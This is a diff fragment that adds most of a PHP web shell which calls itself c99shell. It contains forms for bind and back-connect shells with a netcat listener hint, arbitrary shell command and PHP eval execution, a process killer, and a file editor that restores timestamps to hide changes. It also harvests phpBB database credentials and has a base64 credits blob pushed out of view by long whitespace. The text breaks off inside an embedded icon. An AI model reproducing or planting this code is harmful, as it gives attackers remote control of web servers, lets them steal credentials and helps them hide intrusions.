+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    myshellexec($cmd);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   echo "<tr border=\"1\">";
+   foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+   echo "</tr>";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+     echo "</tr>";
+    }
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+array("SDB","sdb"),
+array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+);
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+  echo "</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else
+   {
+    echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
+   }
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "<tr class=tr><td><b>Perms</b></td><td>";
+   
+   if (is_writable($d.$f))
+   {
+    echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+   }
+   else
+   {
+    echo "<font>".view_perms(fileperms($d.$f))."</font>";
+   }
+
+   echo "</td></tr>";
+   echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><br>";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "<b>FULL HEXDUMP</b>";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "<b>HEXDUMP PREVIEW</b>";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000<br>";
+    $a1="";
+    $a2="";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1.=sprintf("%02X",ord($str[$i])).' ';
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2.="<font class=s2>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2.="&nbsp;"; break;
+      default:  $a2.=htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+      $a1.="<br>";
+      $a2.="<br>";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+         "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+   <P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "<pre>";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+   echo "<pre>";
+   var_dump(unserialize(base64_decode($r)));
+   echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+     echo "</b>";
+     echo "<hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPC9iPjwvY2VudGVyPiDA4vLu8CDi+/Dg5uDl8iDh6+Dj7uTg8O3u8fL8IO7k7e7s8yDv8O7i8yDq7vLu8PvpIO7y6uv+9+jrIOXj7iDt4CDs5fH/9iDu8iDo7eXy4Cwg5OXr7iDh++vuIOLl9+Xw7uwg6CDk5evg8vwg4fvr7iDt5ffl4+4gOykgz+7k8u7r6u3z6+Ag6iDt4O/o8eDt6P4g8erz6uAg6CDs7v8g7/Do8O7k7eD/IOvl7fwgOik8Y2VudGVyPjxiPs/w4OLo6+A8L2I+OjwvY2VudGVyPiA8Yj7C+yDs7ubl8uUg6Ofs5e3/8vwg7/Du4/Dg7OzzIO/uIMLg+OXs8yDz8ezu8vDl7ej+LCDs5e3/8vwg7eDx8vDu6eroLCDk6Ofg6e0uLi4g7e4g5fHr6CDC+ywg8+Lg5uDl7PvpLCDz5".																														"ODr6PLlIOjr6CDy5ewg4e7r5eUg6Ofs5e3o8uUg6u7v6PDg6fL7LCDy7iD/IOHz5PMg4vvt8+bk5e0g7vLu8OLg8vwg4uDsIP/p9uAuIDwvYj48YnI+wOLy7vAg7eUg7eXxuPIg7vLi5fLx8uLl7e3u8fLoIOfgIOLu5+zu5u376SDi8OXkIO3g7eXt5e376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
